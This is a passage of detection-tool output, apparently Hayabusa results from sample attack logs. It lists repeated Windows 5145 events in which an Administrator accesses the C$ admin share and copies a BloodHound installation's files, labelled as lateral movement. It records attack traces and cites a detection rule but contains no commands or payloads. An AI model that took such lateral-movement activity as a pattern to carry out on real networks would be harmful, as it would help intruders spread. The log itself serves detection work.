| Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\cjs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.139 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\prop-types-extra | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-overlays | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-prop-types | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\uncontrollable | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.199 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\cjs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\.github | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\components | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\icons | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\components | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\icons | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\cjs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-lifecycles-compat | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__ | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__\__snapshots__ | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage\lcov-report | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\__tests__ | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\config | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 